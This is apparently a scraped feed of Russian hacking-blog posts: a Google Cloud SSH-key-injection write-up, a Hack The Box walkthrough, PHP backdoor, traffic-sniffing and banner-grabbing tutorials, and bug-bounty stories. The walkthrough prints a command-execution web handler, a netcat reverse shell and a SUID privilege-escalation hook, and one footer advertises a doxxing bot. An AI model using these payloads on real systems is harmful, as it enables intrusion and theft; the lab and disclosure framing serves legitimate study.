the Matrix

Как сделать инъекцию SSH ключа в Google Cloud Compute Engine

2023-01-22T08:09:56.735Z

После постоянного поиска ошибок в обычных приложениях Google, таких как Drive, мы захотели перейти в Google Cloud. Это была первая уязвимость, которую мы обнаружили на платформе и которая привела к RCE в один клик в инстансе Compute Engine пользователя-жертвы.

Это были наши первые шаги в Google Cloud и мы, естественно, наткнулись на один из самых популярных продуктов — Compute Engine. Изучая его возможности и то, как он работает, я заметил «SSH-in-browser». Это функция в GCP, которая позволяет пользователям получать доступ к своим инстансам в браузере через SSH. Визуально этот интерфейс очень похож на Cloud Shell.

SSH-консоль в браузере

Я рассматривал различные функции и опции SSH-in-browser и моё внимание привлекла возможность изменить имя пользователя.

Получение ввода имени пользователя от пользователя

В этом диалоговом окне вводится имя пользователя, которое затем передается на сервер через GET параметр newLinuxUsername. Даже если указанное имя пользователя не существует, он создаст нового пользователя с указанным именем и зарегистрирует вас как этого пользователя.

https://ssh.cloud.google.com/v2/ssh/projects/{PROJECT-NAME}/zones/{INSTANCE-ZONE}/instances/{INSTANCE-NAME}?newLinuxUsername={USERNAME}

Поскольку не было никакого рандомного токена или защиты от CSRF, любой мог создать ссылку и отправить ее пользователю Compute Engine, чтобы создать нового пользователя в его экземпляре. Не очень впечатляюще, но есть на что обратить внимание. Но самое интересное заключалось в том, что, по крайней мере, на первый взгляд, это выглядело так, как будто он просто принимал пользовательский ввод и передавал его в useradd или adduser.

Я попытался добавить полезные нагрузки, такие как `whoami`, $(whoami), чтобы увидеть, будут ли они выполнены. Однако ничего не произошло. Чтобы проверить инъекцию команды второго порядка, я попробовал `curl https://stazot.com` в качестве полезной нагрузки. И снова ничего не произошло. Я вернулся на страницу инстанса Compute Engine и начал искать другие вещи.

Я заметил, что в разделе «Ключи SSH» были перечислены имена пользователей, которые я использовал в качестве полезной нагрузки. Этот раздел содержит список всех пользователей и их соответствующие добавленные или сгенерированные SSH-ключи. В то время как полезные нагрузки, такие как `whoami` были отображены как есть, полезная нагрузка curl была указана странным образом.

SSH-ключи экземпляра

Поле имени пользователя содержало `curl http, а поле SSH ключа содержало stazot.com`:ssh-key-value В тот же миг в моей голове зазвенели колокольчики.

Сервер использовал символ двоеточия :в качестве разделителя. Всё, что до :считалось именем пользователя, а все после : считалось SSH-ключом для этого пользователя. Теоретически, это должно позволить злоумышленнику ввести имя пользователя и свой открытый SSH-ключ. Это возможно, потому что, как отмечалось ранее, сервер принимает этот ввод в GET запросе и не имеет защиты от CSRF.

Таким образом, если заставить жертву открыть вредоносную ссылку, то добавится имя пользователя и SSH-ключ злоумышленника. Чтобы проверить уязвимость, я создал следующий URL-адрес с attacker:{URL-ENCODED-SSH-PUBLIC-KEY} в качестве полезной нагрузки:

https://ssh.cloud.google.com/v2/ssh/projects/{PROJECT-NAME}/zones/{INSTANCE-ZONE}/instances/{INSTANCE-NAME}?newLinuxUsername=attacker:{URL-ENCODED-SSH-PUBLIC-KEY}

Открыл ссылку как жертва — и попытался войти в инстанс как злоумышленник. Однако это не сработало. Причина заключалась в том, что добавленный мной SSH-ключ был добавлен к SSH-ключу, сгенерированному Google в серверной части. Чтобы исправить это, я добавил символы возврата строки к полезной нагрузке:

https://ssh.cloud.google.com/v2/ssh/projects/{PROJECT-NAME}/zones/{INSTANCE-ZONE}/instances/{INSTANCE-NAME}?newLinuxUsername=attacker:{URL-ENCODED-SSH-PUBLIC-KEY}%0d%0a

Как только жертва открыла эту ссылку, я попытался войти в этот инстанс как злоумышленник — и это сработало! Я вошел в систему на целевой машине с правами sudo.

Вот видео, демонстрирующее атаку:

Почему существовала эта ошибка?

Это поведение существовало для облегчения авторизации через функцию SSH-in-browser. Поскольку браузер действует как SSH-клиент, для входа в инстанс ему требуется авторизованный SSH-ключ.

Compute Engine обрабатывает это, создавая SSH-ключ для каждого пользователя в экземпляре (который использует SSH-in-browser) и сохраняет его в метаданных. Когда пользователь входит в систему с помощью SSH-in-browser, инстанс извлекает все авторизованные SSH-ключи с сервера метаданных и регистрирует пользователя.

Это очень сложный процесс, который подробно описан здесь.

Оригинал на английском тут.

Новости кибербеза #1

2022-11-18T23:43:30.726Z

🛡Как за $20 взломать сотни IT-компаний мира

Исследователи из ИБ-компании Checkmarx выяснили подробности продолжающейся атаки на цепочку поставок, которая использует вредоносные PyPI-пакеты для распространения вредоносного ПО W4SP Stealer , и на сегодняшний день жертвами злоумышленников стали более 100 жертв. По словам эксперта Checkmarx Йоссефа Харуш, кибепреступник по-прежнему активен и выпускает новые вредоносные пакеты. Харуш назвал злоумышленника «WASP».

🧑🏻‍💻Читать далее

🛡В Госдуму внесли законопроект о конфискации имущества у киберпреступников

Законопроектом предлагается дополнить пункт «а» части 1 статьи 104.1 («Конфискация имущества») Уголовного кодекса РФ статьями 272—274.1. Это даст возможность конфисковывать имущество, полученное в результате неправомерного доступа к компьютерной информации (статья 272), создания, использования и распространения вредоносных программ (статья 273), нарушения правил эксплуатации, средств хранения, обработки или передачи компьютерной информации (статья 274) и неправомерного воздействия на критическую информационную инфраструктуру РФ (статья 274.1).

📖Прочитать

❕МИД РФ предупредил о том, что мобильные устройства россиян могут прослушиваться на территории ЕС

Иван Нечаев, замглавы департамента информации и печати Министерства иностранных дел РФ, во время общения с журналистами заявил, что мобильные устройства граждан России, которые на данный момент пребывают на территории Европейского союза, могут быть прослушаны третьими лицами, сообщают «Известия».

🧑🏻‍💻Подробности

𝚝𝚑𝚎 𝚖𝚊𝚝𝚛𝚒𝚡

Перехват изображений в локальной сети с помощью Driftnet

2022-10-12T09:10:40.641Z

Мы уже рассказывали, как используя Wireshark перехватить трафик. Каким бы хорошим ни был Wireshark, его нельзя использовать для перехвата изображений, передаваемых по сети. Далее рассмотрим инструмент Driftnet, с помощью которого попробуем перехватить изображения в локальной сети.

Еще по теме: Сетевая разведка и перехват трафика с помощью ARP

Driftnet – это инструмент, который может прослушивать сетевой трафик и перехватывать изображения из TCP потока. В новой бета версии добавлена возможность перехвата видео в формате MPEG и аудио в различных форматах.

Но как Дрифтнет перехватывает эти изображения? Эти изображения передаются по сети без какого-либо шифрования. Следовательно, Driftnet может их перехватить.

Перехват изображений в локальной сети с помощью Driftnet

Для этого урока нам понадобится любая программа, которая передает изображений по сети. Я буду использовать Netop Vision Pro. Как следует из названия, это ПО для управления классом, используемое для дистанционного обучения. Программа состоит из двух частей:

Модуль «Учитель»
Модуля «Студент»

Модуль «Учитель» устанавливается на одну систему, а модуль «Ученик» — на всех контролируемых системах. Компьютер, на котором запущен модуль «Учитель», имеет полный контроль над компьютером, на котором запущен модуль «Ученик», а у ученика нет или очень ограниченная роль.

Самая важная деталь – учитель может просматривать рабочий стол учащегося. Это функция нам нужна для перехвата изображений передаваемых по сети.

Создание стенда для перехвата изображений

Для демонстрации работы Driftnet, нам понадобятся:

Системы Windows с модулем Netop Vision. На одной будет установлен модуль Netop Vision Teacher, а на другой Student.
Kali Linux, которая является атакующей системой и используется для перехвата изображений.

Установка Netop Vision Student

Сначала настроим лабораторию. Скачаем и установим Netop Vision.

После завершения установки, перезагрузим все компьютеры и добавим системы с установленным модулем «Ученик» в главный командующий модуль «Учитель»

Теперь нам понадобиться Kali Linux. Вы можете установить Kali Linux на флешку или использовать Kali Linux на Windows под WSL.

Стенд готов.

Установка и использование Driftnet для перехвата изображения

Теперь установим Driftnet на Kali Linux:

1sudo apt-get install driftnet

Проверьте имя сетевого интерфейса.

1ip a

Теперь все, что нужно сделать, это запустить Driftnet на выбранном интерфейсе.

1sudo driftnet -i eth0

Откроется небольшое окно, как показано ниже.

Снимки экрана компьютера получает модуль учителя, через регулярные короткие промежутки времени. Когда вы развернете окно, вы увидите передаваемые изображения рабочего стола ученика.

Захват изображений из сетевого трафика

Параметры и аргументы Driftnet:

-h – отображает справку.
-b – сигнализирует при захвате нового изображения.
-i – выбор интерфейса для прослушивания (по умолчанию используются все интерфейсы).
-f файл – открывает сохраненные захваченные пакеты из дампа файла pcap.
-a – не выводит изображения на экране, а только сохраняет их во временную директорию и отображает имена в стандартном выводе.
-m количество – максимальное количество перехваченных изображений для хранения во временной директории в режиме-a.
-d директория – устанавливает временную директорию.
-x префикс – префикс для использования во время сохранения изображений.
-s – вместе с изображениями пытаться извлечь потоковое аудио из сети.
-S – перехватывает только потоковое аудио.

На этом все. Вот так можно перехватить изображения в локальной сети.

РЕКОМЕНДУЕМ:

Источник

Наши проекты:

- Кибер новости: the Matrix
- Хакинг: /me Hacker
- Кодинг: Minor Code
👁 Пробить человека? Легко через нашего бота: Мистер Пробиватор

Взлом удаленного хоста через Git и привилегии с GTFOBins

2022-10-11T10:34:35.695Z

В этой статье рассмотрим прохождение уязвимой машины OpenSource Hack The Box, в рамках которой будем взламывать удаленных хост через Git и поднимать привилегии используя одну из техник GTFOBins,

Еще по теме: Как взломать сайт WordPress
Лучше подключаться к машине HTB с помощью VPN. И желательно не делать это со своего личного компа, на котором хранится чувствительная информация. Взлом удаленного хоста через Git и привилегии с GTFOBins

Взлом веб-сервера на PHP

Для начала добавим IP-адрес машины в /etc/hosts:

110.10.11.164 opensource.htb

Начнем со сканирования портов. Это стандартная операция при любом пентесте. Сканирование портов позволит определить, какие службы на машине принимают соединение.

Для этого отлично подходит популярный сканер Nmap. Следующий скрипт улучшит результаты сканирования:

123#!/bin/bashports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)nmap -p$ports -A $1

Он действует в два этапа. Первый производит просто быстрое сканирование, второй — глубокое сканирование, используя имеющиеся скрипты (опция—A)

Результат работы скрипта

Сканер смог найти только два открытых порта:

22 — служба OpenSSH 7.6p1
80 — веб‑сервер Python Werkzeug 2.1.2; а

Также фильтрующийся порт 3000. Взглянем на веб-сервер.

Главная страница HTB

Находим ссылку на файл. Исходя из названия можно догадаться, что это какой-то исходный код.

Скачивание архива

В архиве лежит каталог .git, который стоит изучить.

Содержимое скаченного архива

Распаковываем его и заходим в директорию, содержащую репозиторий Git. После чего расмотрим существующие ветки.

1git branch

Ветки Git-репозитория

Далее получаем историю коммитов. Рассмотрим ее получше.

1git log dev

История коммитов Git

Теперь просматриваем каждый коммит в надежде найти важные данные. И в одном из них обнаруживаем URL прокси‑сервера с указанными учетными данными.

1git show a76f8f75f7a4a12b706b0cf9c983796fa1985820

Коммит с учетными данными

Больше в репозитории ничего не находим, поэтому начинаем изучать исходный код приложения.

Содержимое файла static/views.py

Как видишь, мы можем загружать файлы с любым расширением. Сразу бросается в глаза функция os.path.join — строка 14. Последовательность ../ фильтруется, что не позволит записать свой SSH-ключ пользователю, даже если мы узнаем путь. Однако файл сохраняется с тем же именем без всяких временных меток, что дает нам возможность перезаписывать существующие файлы.

Точка опоры

Давай попробуем перезаписать текущий файл, добавив в его конец свой обработчик, к примеру /ralf.

123@app.route('/ralf')def ralf(): return os.system(request.args.get('cmd'))

Ссылку на страницу для загрузки файла найдем чуть ниже кнопки скачивания репозитория.

Форма для загрузки файлов

Загрузим наш новый файл view.py и перехватим запрос на загрузку в Burp Intercept.

Перехваченный запрос на загрузку файла

Для перезаписи файла изменим filename и вместо views.py запишем полный путь к этому файлу — /app/app/views.py.

Измененный запрос на загрузку файла

Когда все будет готово, отправим запрос дальше на сервер. На странице получим сообщение, что загрузка прошла успешно.

Сообщение об успешной загрузке файлов

Теперь мы можем выполнять команды и сразу попробуем запустить реверс‑шелл:

1rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.49 4321 >/tmp/f

Я выполнял запрос через curl, поэтому мне нужно было закодировать реверс‑шелл в кодировку URL. Burp Encoder закодирует абсолютно все символы, а не только специальные. Это не очень удобно, поэтому я просто вставляю текст в Burp Repeater и кодирую комбинацией клавиш Ctrl-U. Однако сгодится и любой другой метод.

1curl 'http://opensource.htb/ralf?cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.49 4321 >/tmp/f'

Исходная команда curl

1curl 'http://opensource.htb/ralf?cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.49+4321+>/tmp/f'

Закодированная команда curl

Осталось командойrlwrap -cAr nc -lnvp 4321 запустить листенер и выполнить команду для запуска реверс‑шелла.

Сессия пользователя

Продвижение

По имени пользователя понимаем, что находимся внутри контейнера Docker. Дальнейший путь продвижения долго искать не приходится: вспоминаем про фильтрацию подключений к порту 3000. Сначала проверим адрес докер‑машины, а потом уже попробуем подключиться к порту 3000 хостовой.

Результат выполнения команды ifconfig

lОбращение к порту 3000 с помощью curl

Для удобной работы через браузер нам нужно туннелировать трафик. Я буду использовать chisel, который нужно запустить как на локальном хосте, в качестве сервера, так и на удаленном — как клиент. В параметре серверной части указываем, что ожидаем подключения (параметры —reverse), а также порт для создания туннеля.

1chisel.bin server --reverse --port 8000

Логи серверной части

Теперь на удаленной машине инициализируем клиентскую часть. В параметрах указываем адрес сервера chisel и порт для подключения, а также настройки проксирования.

1chisel.bin client 10.10.14.49:8000 R:3000:172.17.0.1:3000

Логи клиентской части

В логах сервера должны увидеть сообщение о создании сессии.

Логи серверной части

Таким образом, весь трафик, который мы пошлем на локальный порт 3000, будет туннелирован на порт 3000 указанного хоста (в данном случае 172.17.0.1) через докер‑машину. Теперь откроем сайт в браузере и увидим Git.

Главная страница сайта на порте 3000

Воспользовавшись учетными данными, которые мы нашли в репозитории, авторизуемся на сайте.

Главная страница сайта после авторизации

Переходим к единственному доступному репозиторию и видим бэкап домашнего каталога пользователя.

Содержимое Git-репозитория

Конечно же, нас интересует приватный ключ SSH.

Содержимое каталога .ssh

SSH-ключ пользователя dev01

Копируем его на локальный хост, командой chmod 0600 id_rsa назначаем необходимые права и подключаемся с этим ключом уже к основному хосту.

Флаг пользователя

Локальное повышение привилегий

Первым делом я, как обычно, поискал все сомнительные настройки и пользовательские скрипты с помощью многократно упоминавшегося в моих райтапах LinPEAS, но ничего не нашел.

Следующий шаг — мониторинг запускаемых приложений. Чтобы найти запускаемые в системе процессы, будем использовать утилиту pspy64. Загрузим ее на хост при помощи wget, а потом выполним.

В выводе отмечаем использование команды git, причем от имени привилегированного пользователя (нулевой UID — это root).

Вывод утилиты pspy64

Тут я обратился к GTFOBins. Это база техник, которые позволяют повысить привилегии при помощи стандартных приложений Linux. В частности, есть техника использования Git, которая позволяет получить стабильную оболочку в привилегированном контексте. Нам она подходит, только вместо контекста sudo у нас будет контекст пользователя root.

Описание техники sudo GTFOBins для Git

Здесь используется перехватчик Git, который связан с pre-commit. То есть мы можем записать свой скрипт в файл ~/.git/hooks/pre-commit, и код выполнится при выполнении команды git commit. В качестве метода персистентности будем устанавливать S-бит файлу командной оболочки /bin/bash.

12# echo "chmod u+s /bin/bash" >> ~/.git/hooks/pre-commitmv ~/.git/hooks/pre-commit.sample ~/.git/hooks/pre-commit

Содержимое файла pre-commit

Справка: бит SUID

Когда у файла установлен атрибут setuid (S-атрибут), обычный пользователь, запускающий этот файл, получает повышение прав до пользователя — владельца файла в рамках запущенного процесса. После получения повышенных прав приложение может выполнять задачи, которые недоступны обычному пользователю. Из‑за возможности состояния гонки многие операционные системы игнорируют S-атрибут, установленный shell-скриптам.

Источник

Наши проекты:

Вот как взломал сайт Tesla и получил 10.000$

2022-10-10T07:58:09.606Z

Многие хотят заниматься багхантингом и участвовать в программах Багбаунти, но боятся начать. Я Xail, днем пентестер в хакерской команде Red Team, по ночам багхантер. В этой короткой статье я поделюсь своим кейсом взлома сайта Tesla. Я покажу, как с легкостью смог найти уязвимость класса P1 и заработать на этом немного денег. Надеюсь, мой опыт послужит для вас хорошим примером и будет мотивировать. Погнали!

Еще по теме: Вот как я взломал сайт NASA

Заранее предупреждаю, не ожидайте ничего особо умного. Это был низко висящий фрукт, который можно было сорвать без особых усилий и знаний, но в этом и заключается фишка, кто не хочет без труда сорвать бабла?!

Багбаунти не имеет никакого отношения к батончику с райским вкусом, — это программа, которую владелец сайта (web-приложения) проводит для привлечения сторонних специалистов в области ИБ к поиску уязвимостей. При участии в программе Bug Bounty нужно действовать этично и придерживаться установленных правил. Не забывайте, что несанкционированный взлом является незаконным и расценивается, как уголовное преступление. Ни редакция spy-soft.net, ни автор не несут ответственность за ваши незаконных действия.Взломал сайт Tesla и получил 10.000$

26 февраля 2021 года в рамках программы багбаунти я сообщил об обнаруженной мною уязвимости на сайте Tesla. Уязвимость позволила мне получить доступ к конфиденциальной информации, наиболее важной из которых был общий ключ IKE, который можно было использовать для подключения к корпоративной сети Tesla.

Вот как все было. После поиска поддоменов и определения серверов, которые прослушивают TCP-порты 80 и 443, я решил зарядить Dirbuster со стандартным списком слов.

Через нескольких часов сканирования, обнаружил интересную вещь. Было включено индексирование на:

1https://trt.teslamotors.com

в каталоге:

1/uploads

Это означало, что я мог просматривать все файлы, которые находились в директории.

Просмотрев различные файлы в каталоге/uploads, я обнаружил файл .zip с именем pdx01.zip. Долго не думая, скачал его на виртуалке и обнаружил внутри несколько файлов конфигурации.

Среди этих файлах мне удалось найти общий ключ VPN, который позволяет аутентифицироваться в корпоративной сети Tesla.

Я также нашел пароли WiFi магазинов Tesla и пароли Radius.

Файлы конфигурации, содержащие хэши и пароли в открытом виде

Я сразу же сообщил об этой проблеме Tesla через их программу BugCrowd Bug Bounty. Работники Tesla быстро отреагировали, приняли уязвимость, пометили ее как P1 (высокий уровень угрозы) и устранили проблему. После чего скинули мне 10.000$.

Вот как выглядит моя находка на сайте программы поощрений Tesla.

Спасибо Тесла — это отличный пример компании, которая серьезно относится к безопасности и вознаграждает тех, кто помогает им выявлять и устранять проблемы. Ну и отдельное спасибо за 10.000$, на улице такие деньги не валяются.

Как видите взламывать сайты Тесла, не только прикольно, но и выгодно. Хотя и взломом это трудно назвать )

РЕКОМЕНДУЮ:

Источник

Наши проекты:

Использование WeBaCoo для создания бэкдора PHP

2022-10-01T14:57:54.303Z

WeBaCoo (Web Backdoor Cookie) — скрипт для создания бэкдора PHP (скрытого соединения между клиентом и веб-сервером через HTTP). Это инструмент пост-эксплуатации, способный поддерживать доступ к скомпрометированному веб-серверу. В этой статье я познакомлю с WeBaCoo и покажу как его использовать на Kali Linux.

Еще по теме: ICMP-туннелирование при пентесте

Что такое WeBaCoo

WeBaCoo — этот скрипт Perl для создания бэкдора и удаленного скрытого подключения к веб-серверу. Инструмент был разработан для работы под радаром современных антивирусов, NIDS (систем обнаружения), IPS (систем предотвращения вторжений), сетевых брандмауэров и брандмауэров приложений.

Статья написана в образовательных целях, для обучения этичных хакеров. При демонстрации работы были использованы личные устройства автора. Использование подобных инструментов без надлежащего письменного разрешения, является незаконным и будет расцениваться, как уголовное преступление. Ни редакция spy-soft.net, ни автор не несут ответственность за ваши действия.

Инструмент имеет два режима работы:

Генерация (-g) — режим для создания бэкдора PHP.
Терминал (-t) — режим для подключения к бэкдору.

Интересная особенность WeBaCoo заключается в том, что соединение между веб-сервером и клиентом закодировано в файле cookie заголовка HTTP, поэтому его трудно обнаружить антивирусом, системами обнаружения / предотвращения сетевых вторжений, сетевыми брандмауэрами и брандмауэрами приложений.

Установка WeBaCoo

WeBaCoo уже предустановлен на Kali Linux, но если вы используете другой дистрибутив, тогда можете установить черезapt:

1sudo apt install webacoo

Использование WeBaCoo для создания скрытого соединения

Сначала по традиции заглянем в справку WeBaCoo:

1webacoo -h

Теперь используя WeBaCoo, создадим бэкдор PHP:

1webacoo -g -o /home/kali/testbackdoor.php

В приведенной выше команде, мы используем параметр-g для создания бэкдора и параметр-o для выбора местоположения созданного файла (в моем случае — домашний каталог):

1home/kali

После выполнения команды будет создан бэкдор PHP.

Теперь пришло время загрузить его на уязвимый сервер или сайт. Здесь мы предполагаем, что сервер не имеет никаких ограничений, которые могут запрещать определенные расширение или типы загружаемого файла.

Для этого примера, загрузим его на специально уязвимое веб-приложение DVWA, созданное для таких, как мы (этичных хакеров).

После успешной загрузки, будет отображен путь к загруженному файлу (см. скрин выше). Этот путь является фактическим местоположением загруженного файла. Он нужен нам для доступа к полезной нагрузке.

Теперь можем получить доступ к бэкдору PHP с помощью WeBaCoo. Для этого в терминале выполняем команду:

1webacoo -t -u http://127.8.0.1/hackable/uploads/testbackdoor.php

После применения вышеуказанной команды, вы увидите сообщение о подключение бэкдора. Чтобы проверить работу бэкдора, запустим несколько команд.

С помощью префикса: можно управлять бекдором, выполняя различные команды. Со всеми остальными фишками, разберетесь сами.

Вот как можно создать бэкдор PHP с помощью WeBaCo и использовать его для удаленного подключения.

Как видите WeBaCoo очень прост в использовании, но используйте тулзу с умом, не нарушая закон!

РЕКОМЕНДУЕМ:

Источник

Наши проекты:

Работа с большими словарями для брута на Kali Linux

2022-09-28T07:35:21.985Z

В пентестах и в форензике часто используют атаку Брутфорс (брут). Но успешный брут зависит не только от длины посоха пароля, но и от хорошего словаря. Чтобы подобрать пароль, может потребоваться большой список паролей и логинов. Работа с хорошими большими словарями для брута может быть довольно затруднительна. В этой статье я познакомлю вас, с инструментами Kali Linux, которые облегчат эту задачу.

Еще по теме: Огромный словарь для брута (Английские слова)

Работа с большими словарями для брута на Kali Linux

Манипуляции с большими текстовыми файлами — это всегда неприятные ощущения и геморрой. Если вы когда-нибудь пытались отредактировать текстовый файл размером 10 ГБ на ноутбуке среднего класса, то понимаете о чем я говорю.

В этой ситуации можно использовать два инструмента — Dymerge и просто команды оболочки Bash.

Работа с большими словарями для брута с помощью Dymerge

Dymerge — это скрипт Python для работы словарями для брута. Это простой консольный инструмент, который может объединять словари для брута или добавлять / удалять определенные слова из списка слов.

Для установки Dymerge на Kali Linux:

1git clone https://github.com/k4m4/dymerge

Преходим в каталог dymerge:

1cd dymerge

С помощью команду ls отобразим содержимое:

1ls

Среди файлов находим скрипт Python dymerge.py.

По традиции открываем справку:

1python dymerge.py --help

Видим параметры и возможности.

Итак, на рабочий стол я закинул словари для брута.

Попробуем объединить все текстовые файлы в один большой словарь, а на выходе заархивируем его, чтобы он не занимал много места.

Параметр -o используем для выбора местоположения конечного файла и формата.

Можно также добавить отдельные слова в конечный файл, (добавим, на пример, слово KaliLinuxIn), для этого используем директиву -i.

Параметр-u позволяет удалить повторяющиеся пароли.

Со всеми нашими хотелками, команда будет выглядеть так:

1python dymerge.py /home/kali/Desktop/my-wordlists -u -f -o /home/kali/Desktop/my-wordlistsgiantwordlist.txt -i KaliLinuxIn -z bz2

После выполнения видим следующее:

Дождитесь окончания процесса. Скорость работы зависит от размера и мощности компьютера.

После завершения, в каталоге появился архив «giant-wordlist.txt.bz2.

Так работает Dymerge. В целом это хороший инструмент, но он плохо работает с огромными файлами. Это связано с тем, что он загружает каждое слово из каждого словаря в массив, что может вызвать зависания.

Его можно заменить командами оболочки Bash.

Командами оболочки Bash — хорошая альтернатива DyMerge

Вот некоторые варианты использования Dymerge и аналог команды оболочки Bash.

Команда Dymerge:

1python dymerge.py /usr/share/wordlists/rockyou.txt /lists/cewl.txt -s -u

Аналог Bash:

1sort -u /usr/share/wordlists/rockyou.txt /lists/cewl.txt > output.txt

Команда Dymerge:

1python dymerge.py /lists/cewl.txt /lists/awlg.txt -s -u -i Passw0rd,inpuT

Аналог Bash:

1sort -u /lists/cewl.txt /lists/awlg.txt <(echo 'Passw0rd\ninpuT') > output.txt

Команда Dymerge:

1python dymerge.py ~/fsocity.dic -s -u -r -o ~/clean.txt

Аналог Bash:

1sort -r <~/fsocity.dic | uniq> clean.txt

Команда Dymerge:

1python dymerge.py /dicts/crunch.txt /dicts/john.txt -s -u -f -z bz2

Аналог Bash:

1sort -u /dicts/crunch.txt /dicts/john.txt | bzip2 > output.bz2

С помощью рассмотренных инструментов, вы сможете добавлять, удалять слова (и не только) и обеднять большие словари для брута. Какой инструмент использовать, выбирать только вам.

На сегодня все. Встретимся в следующей статье!

РЕКОМЕНДУЕМ:

Источник

Наши проекты:

Нашел уязвимости на сайте Nokia с помощью Google Dorks

2022-09-26T11:23:30.827Z

Здравствуйте, господа багхантеры! Меня зовут Джениш Паншал и в этой короткой статье я расскажу об уязвимости, связанной с неправильной конфигурацией SSL, и о том, как мне удалось, с помощью простого Гугл Дорка, найти эту уязвимость на сайтах Nokia и Кембриджского университета.

Еще по теме: Интересные уязвимости PostgreSQL

Уязвимости на сайте Nokia и Кембриджского университета

Неправильная конфигурация SSL (SSL Misconfiguration) позволяет инициировать атаку «человек посередине», притворяясь веб-сервером, пока клиент не согласится использовать для подключения шифрование SSL 3.0. Затем злоумышленник получает нужную информацию с помощью автоматизированных инструментов, которые изменяют блоки заполнения и ждут ответа сервера. Подробнее рассказывалось в статье «Уязвимости SSL и TLS-протокола»

Bug Bounty — это программа, которую владелец сайта (web-приложения) проводит для привлечения сторонних специалистов в области ИБ к поиску уязвимостей. При участии в программе Bug Bounty нужно действовать этично и придерживаться установленных правил. Не забывайте, что несанкционированный взлом является незаконным и расценивается, как уголовное преступление. Ни редакция spy-soft.net, ни автор не несут ответственность за ваши действия.

Google Dork Queries — это набор поисковых запросов для выявления грубейших дыр в безопасности. Всего, что должным образом не спрятано от поисковых роботов.

Для краткости такие запросы называют Гугл Дорки или просто дорками, как и тех админов, чьи ресурсы удалось взломать с помощью GDQ. Подробнее о Гугл Дорках и примерах использования, в статье «Что такое Google Dorks».

Для поиска уязвимых ресурсов был использован следующий дорк:

1site:*.target.com inurl:http register signup

Дорк позволяет найти поддомены (в данном случае поддомены Nokia и Кембриджского университета), которые работают на протоколе HTTP и позволяют пользователю зарегистрировать учетную запись в своем веб-приложении.

После того как наметились потенциальные цели. Я сделал следующее:

>Во-первых, зарегистрировался по всем найденным адресам.

После регистрации, не входя созданную учетную запись, запросил сброс пароля нажав на «Забыл пароль».

Проверил, работает ли ссылка для сброса пароля на HTTPS или на HTTP.

Ссылка для сброса пароля работала на HTTP, что указывает на уязвимость SSL.

Письмо об уязвимости SSL было отправлено в Nokia 16 августа утром. В тот же день ночью я получил ответ.

Найти мой репорт и ссылку на профиль может здесь, в разделе за август 2022 год.

Письмо об уязвимости SSL в Кембриджский университет и ответ на него.

Вот, как простая уязвимость и умение использовать Гугл Дорки, может сделать вас успешным багхантером.

РЕКОМЕНДУЮ:

Источник

Наши проекты:

Сбор баннеров на Kali Linux

2022-09-25T10:41:55.940Z

Сбор баннеров или как говорят наши иностранные коллеги Banner Gabbing — это получение информации об открытых портах и работающих службах хоста. Эта техника используются хакерами и пентестерами для анализа системы. В сегодняшней статье я познакомлю вас с лучшими инструментами для сбора баннеров на Kali Linux.

Еще по теме: HTTP-сервер с шифрованием TLS на Kali Linux

Сбор баннеров на Kali Linux

Далее рассмотрим инструменты, которые предустановлены в Kali Linux. Если вы работаете на другом дистрибутиве Linux, вы можете установить их самостоятельно с помощью:

1apt-get install

Речь пойдет об инструментах:

Whatweb
Curl
Wget
netcat
telnet
nikto
Nmap

Для демонстрации я буду использовать намеренно уязвимый сайт уязвимый сайт testphp.vulnweb от Acunetix, специально разработанный для таких, как мы (этичных хакеров).

Статья написана в образовательных целях, для обучения этичных хакеров. При демонстрации работы были использованы личные устройства автора. Использование подобных инструментов на чужих устройствах без надлежащего письменного разрешения, является незаконным и будет расцениваться, как уголовное преступление. Ни редакция spy-soft.net, ни автор не несут ответственность за ваши действия.

Whatweb

Откройте консоль Kali Linuix и выполните команду, добавив при этом урл сайта или IP-адрес:

1whatweb <урл_сайта/ip_адрес>

Я использовал сайт Vulnweb. Вместо урла можно указать IP-адрес.

Curl

В терминале Kali выполните следующую команду:

1curl -I <урл_сайта/ip_адрес>

В curl директива-I извлекает заголовок.

Wget

Большинство из вас могут использовать wget для скачивания файлов в терминале. Но wget также может помочь в сборе баннеров.

Откройте консоль Kali и добавив адрес сайта или IP-адрес, выполните следующую команду:

1wget -q -S <урл_сайта/ip_адрес>

Директива-q позволяет скрыть лишнюю информацию, а-S предназначен для получения ответа сервера.

Результат с параметром-q:

Результат без параметра-q:

Netcat

Способ 1: Откройте терминал Kali и выполните команду:

1nc <имя_хоста/ip_адрес> 80

Введите HTTP/1.1 200 и нажмите Enter.

HTTP/1.1 — версия HTTP.
200 — код состояния HTTP.

Способ 2: Выполните команду

1nc <hostname/ip_адрес>

Теперь введите HEAD HTTP/ /1.0 и нажмите Enter.

HEAD — это глагол HTTP, HTTP/ обозначает корень страницы.
/1.0 — версия HTTP.

Telnet

В консоли Kali, выполните команду:

1telnet <имя_хоста/ip_адрес>

Появится подсказка.

Введите HEAD HTTP//1.0 и нажмите Enter.

Nikto

Введите следующую команду и нажмите Enter:

1nikto -h

Вы увидите баннер в качестве вывода. Нажмите Ctrl+C, чтобы остановить.

Nmap

Последний инструмент сбора баннеров на Kali Linux это популярный сканер Nmap.

Подойдите к терминалу и введите

1nmap -sV -A <имя_хоста/ip_адрес> -p 80

Параметр:

-sV используется для определения версии службы.
-A для агрессивного сканирования.
-p для определения порта.

Заключение

Мы рассмотрели популярные способы сбора баннеров на Кали. Конечно, существует множество других инструментов и методов для захвата баннеров, но это самые простые, которые сможете быстро освоить и использовать.

РЕКОМЕНДУЕМ:

Источник

Наши проекты:

Взлом веб-сервера на PHP. Hack The Box Timing

2022-06-09T15:44:25.084Z

В этой статье рассмотрим прохождение уязвимой машины Timing Hack The Box, в рамках которой будем взламывать веб-сервер на PHP. Для получения флага мы будем сканировать порты, эксплуатировать уязвимости LFI и загрузим шелл.

Еще по теме: Как взломать сайт WordPress

Лучше подключаться к машине HTB с помощью VPN. И желательно не делать это со своего личного компа, на котором хранится чувствительная информация.Взлом веб-сервера на PHP

Для начала добавим IP-адрес машины в/etc/hosts:

110.10.11.135 timing.htb

Для этого отлично подходит популярный сканер Nmap. Следующий скрипт улучшит результаты сканирования:

